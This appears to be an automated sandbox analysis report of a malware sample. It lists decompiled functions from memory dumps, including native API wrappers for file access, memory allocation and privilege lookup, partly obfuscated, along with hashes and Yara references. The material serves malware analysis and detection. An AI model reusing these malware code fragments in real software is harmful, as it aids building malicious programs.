			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DC0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181cf
0x004181d7
0x0041820d
0x00418211

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041839F, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041839F(intOrPtr __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				intOrPtr _v117;
				long _t16;

				_v117 = __edx;
				_t12 = _a4;
				_t5 = _t12 + 0xc60; // 0xca0
				E00418DC0(_a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}

0x0041839f
0x004183a3
0x004183af
0x004183b7
0x004183d9
0x004183dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 2fdedd5e0a324c196b296a856eddf0055d0211537518b2a0177a1f7f1b3a3d9e
Instruction ID: 2e18367d8a13050d9991fde09cfca62e0206418bbdc358ea516ae17a277f78e6
Opcode Fuzzy Hash: 2fdedd5e0a324c196b296a856eddf0055d0211537518b2a0177a1f7f1b3a3d9e
Instruction Fuzzy Hash: 6BF01CB1200218AFCB14DF99DC81EEB77ADEF98354F11855DFE0997241C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004183af
0x004183b7
0x004183d9
0x004183dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004182EF, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004182EF(void* __edx, intOrPtr _a4, void* _a8) {
				void* _v117;
				long _t9;

				_t6 = _a4;
				_t3 = _t6 + 0x10; // 0x300
				_t4 = _t6 + 0xc50; // 0x409743
				E00418DC0(_a4, _t4,  *_t3, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}

0x004182f3
0x004182f6
0x004182ff
0x00418307
0x00418315
0x00418319

APIs

NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315

Memory Dump Source

Source File: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: fafdfbf51c3675311832b1c691a2ae26284015f93e63ea0e84628450a87ceaba
Instruction ID: 990cbbcb2ee5c8167574b8e2202a30cfc83364195f73ef9d36716950ab59a1ef
Opcode Fuzzy Hash: fafdfbf51c3675311832b1c691a2ae26284015f93e63ea0e84628450a87ceaba
Instruction Fuzzy Hash: E8E0EC75600214ABD720DFA5DC85EDB7B69EF54350F154559B9199B242CA30A5018A90

Uniqueness

Uniqueness Score: -1.00%

Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004182F0(intOrPtr _a4, void* _a8) {
				long _t8;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182f3
0x004182f6
0x004182ff
0x00418307
0x00418315
0x00418319

APIs

NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315

Memory Dump Source

Source File: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 004088B0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D20( &_v67, 0, 0x3f);
				E0041A900( &_v68, 3);
				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407260
0x0040726f
0x00407273
0x0040727e
0x0040728e
0x0040729e
0x004072a3
0x004072aa
0x004072ad
0x004072ba
0x004072be
0x004072db
0x004072db
0x00000000
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418621, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00418621(signed int __ebx, char __edx, void* __edi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t11;
				void* _t13;

				_pop(_t13);
				asm("into");
				0xffafb143();
				 *__ebx =  *__ebx ^ __ebx;
				 *((char*)(_t13 - 0x39)) = __edx;
				_push(0xec8b552f);
				E00418DC0(_a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t11 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t11;
			}

0x00418621
0x00418622
0x00418623
0x00418628
0x0041862b
0x0041862e
0x0041864a
0x00418660
0x00418664

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 5c29b7dd1d7cf9dda61cfc89db29dae01ba68b6fb00472cb6f35f22d4cec6330
Instruction ID: bd11774a94afdaad914e4fc4aec9abbdaa9964c439b29271abe11a70175b4c4b
Opcode Fuzzy Hash: 5c29b7dd1d7cf9dda61cfc89db29dae01ba68b6fb00472cb6f35f22d4cec6330
Instruction Fuzzy Hash: 31F0E5B02402406FC710DF59DC80FEB3B599F86270F004699F9185F3C1C9309910CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 004184C2, Relevance: 1.5, APIs: 1, Instructions: 27
memoryCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E004184C2(signed int __eax, void* __ecx, signed int __esi, char _a1, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t14;
				signed int _t21;

				asm("cdq");
				asm("a16 pop ebx");
				asm("adc [0x6db6ed50], ebp");
				_t21 = __esi ^  *(__ecx + __eax * 2 - 0x1374aa66);
				_push( &_a1);
				_t11 = _a4;
				_push(_t21);
				_t6 = _t11 + 0xc74; // 0xc74
				E00418DC0(_a4, _t6,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t14 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t14;
			}

0x004184c2
0x004184c3
0x004184c5
0x004184cc
0x004184d0
0x004184d3
0x004184d9
0x004184df
0x004184e7
0x004184fd
0x00418501

APIs

RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD

Memory Dump Source

Source File: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7aaff590910d74c4eb7baba5d2e3379054787d817eefe6605e3c542e6e8da953
Instruction ID: 2ec4a671cce1081d518692a9e5920b6f257d0a5a7916894142d9c0679b9e9b1e
Opcode Fuzzy Hash: 7aaff590910d74c4eb7baba5d2e3379054787d817eefe6605e3c542e6e8da953
Instruction Fuzzy Hash: F4E06DB6200214ABDB14DF55DC44EA77368EF85354F118689FD0957651CB31E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DC0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184df
0x004184e7
0x004184fd
0x00418501

APIs

RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD

Memory Dump Source

Source File: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				E00418DC0(_a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184a7
0x004184bd
0x004184c1

APIs

RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD

Memory Dump Source

Source File: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E00418DC0(_a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041864a
0x00418660
0x00418664

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418510(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E00418DC0(_a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418513
0x0041852a
0x00418538

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040C3C3, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6b26fb91b6171517fd651bf33f0de801f6e228e1901760bc57cf8109f688384
Instruction ID: dbae31ceea72f45eb7f8b22928e9222473989dc622993d4a8d974c47383a39ab
Opcode Fuzzy Hash: c6b26fb91b6171517fd651bf33f0de801f6e228e1901760bc57cf8109f688384
Instruction Fuzzy Hash: 3CE08676E491944AC7579D6878605F5FFA98A4721070855D6DDC8AB312C103940B97E4

Uniqueness

Uniqueness Score: -1.00%

Function 00406AA3, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 655359c605108d4295849482572a8d85d501174ce2015bd01b09fdd14fc6b9ba
Instruction ID: c45fca3aae9d1b20852c66f9acbda28e0ebad291df63cb8263c99b6580101ca2
Opcode Fuzzy Hash: 655359c605108d4295849482572a8d85d501174ce2015bd01b09fdd14fc6b9ba
Instruction Fuzzy Hash: 38B00233F6602515D5259C4D7C412B5E7ACD79B535F103397EC08F755195C7D45201CD

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wlanext.exe PID: 5268 Parent PID: 3388 wlanext.exeCOMMON

Executed Functions

Function 00EE82BA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00EE3A11,?,?,?,?,00EE3A11,FFFFFFFF,?,R=,?,00000000), ref: 00EE82B5

Strings

];, xrefs: 00EE82DC, 00EE82E4

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID: ];
API String ID: 2738559852-1438148892
Opcode ID: fe56a964d3740e54e9b9e5e29bc6355d102ee0d115818cf5613788ef5b06f44f
Instruction ID: 2f4ad8fa4db3affa3d7b2789d809c1bc1b4bcab081c62c8a6e68337a12e4ab16
Opcode Fuzzy Hash: fe56a964d3740e54e9b9e5e29bc6355d102ee0d115818cf5613788ef5b06f44f
Instruction Fuzzy Hash: 28114876200208AFCB14DF99CC81EEB77A9EF8C354F058658FA0DA7251CA30E910CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EE81C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00EE3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00EE3B97,007A002E,00000000,00000060,00000000,00000000), ref: 00EE820D

Strings

.z`, xrefs: 00EE81FD, 00EE8208

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 6937f91238d89e616c701fd47919515e792e0a5dae472162176a5774239edf59
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 7FF0B6B2200108ABCB08CF89DC85DEB77EDAF8C754F158248FA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00EE82EF, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(0=,?,?,00EE3D30,00000000,FFFFFFFF), ref: 00EE8315

Strings

0=, xrefs: 00EE830C, 00EE8314

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: 0=
API String ID: 3535843008-292652348
Opcode ID: 3f68840134a9a5e520a47aefde48a0eb355ae460223f95678c6f520d899fc67e
Instruction ID: 3183b3bcc3d288d9f7121d2e6635b36abd5f49d9a99e0012757277b63f0cd228
Opcode Fuzzy Hash: 3f68840134a9a5e520a47aefde48a0eb355ae460223f95678c6f520d899fc67e
Instruction Fuzzy Hash: 22E01275600114BFD720DFA5CC85EDB7B69EF44350F154559F91DAB242C930E501CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00EE82F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(0=,?,?,00EE3D30,00000000,FFFFFFFF), ref: 00EE8315

Strings

0=, xrefs: 00EE830C, 00EE8314

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: 0=
API String ID: 3535843008-292652348
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 92c7df95dd4cef6459416e4682ada0585a8912f2437e47b71c6dc02a6cd2ad3a
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 48D012752002186BD710EF99CC45E97779CEF44750F154455FA1C5B242C930F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00EE8270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00EE3A11,?,?,?,?,00EE3A11,FFFFFFFF,?,R=,?,00000000), ref: 00EE82B5

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: b450f4b56fe7b6935c819ab7475869db5deea4d8688a48b94854b171cf1f7d25
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: F7F0A9B2200108ABCB14DF89DC81DEB77ADAF8C754F158648FA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EE83A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00ED2D11,00002000,00003000,00000004), ref: 00EE83D9

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: a9619f9814b3ff04e75a9ec71820116c9a4ef2195cd83d312ee1b6a545c7edf9
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 9FF015B2200208ABCB14DF89CC81EAB77ADAF88750F118548FE08A7241CA30F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EE839F, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00ED2D11,00002000,00003000,00000004), ref: 00EE83D9

Memory Dump Source

Source File: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 0b70b1feee83b89057c18397ebb53a22b42913ddf8f99e72d60875da24572e81
Instruction ID: a72eb982dae2ed737b847e254e9d7adba1391f56410c09e55fa6e113d306b572
Opcode Fuzzy Hash: 0b70b1feee83b89057c18397ebb53a22b42913ddf8f99e72d60875da24572e81
Instruction Fuzzy Hash: 8DF01CB1200218AFCB14DF99CC81EEB77ADEF88350F118559FE0DA7241C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03639A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03639A5A

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ffaeb22a3124f716592a17352b9d64b1e67e40a377e175199e3cf6530c31ee6
Instruction ID: 9ac4747113e8439afa2585506ab3dbe55651fc003944595ecf376c1c42ff562c
Opcode Fuzzy Hash: 2ffaeb22a3124f716592a17352b9d64b1e67e40a377e175199e3cf6530c31ee6
Instruction Fuzzy Hash: 16900261B1184442D300A9694C15B07000997D1343F51C115A0144594DCA5588616561

Uniqueness

Uniqueness Score: -1.00%

Function 03639910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0363991A

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 921cfd86c520e37e8e0af399f58b3e0316be25c2d0a7911e884cb313e85eb0c9
Instruction ID: b15039ce8af7a81efdfcb106a00dbff708536232ba846d3fbec28bc4cf9c3ae5
Opcode Fuzzy Hash: 921cfd86c520e37e8e0af399f58b3e0316be25c2d0a7911e884cb313e85eb0c9
Instruction Fuzzy Hash: 309002B1B0104802D240B5594405746000997D1341F51C011A5054594F87998DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 036399A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 036399AA

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4811376e4ff260ff680cdcf9cacf192ca967708d44afe68d757e0a78cef21288
Instruction ID: f241b6e16dcde1c62ba677a8363492e319704806dc331a7173a4f8d971b9f722
Opcode Fuzzy Hash: 4811376e4ff260ff680cdcf9cacf192ca967708d44afe68d757e0a78cef21288
Instruction Fuzzy Hash: 6A9002A1B4104842D200A5594415B060009D7E2341F51C015E1054594E8759CC527166

Uniqueness

Uniqueness Score: -1.00%

Function 03639860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0363986A

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
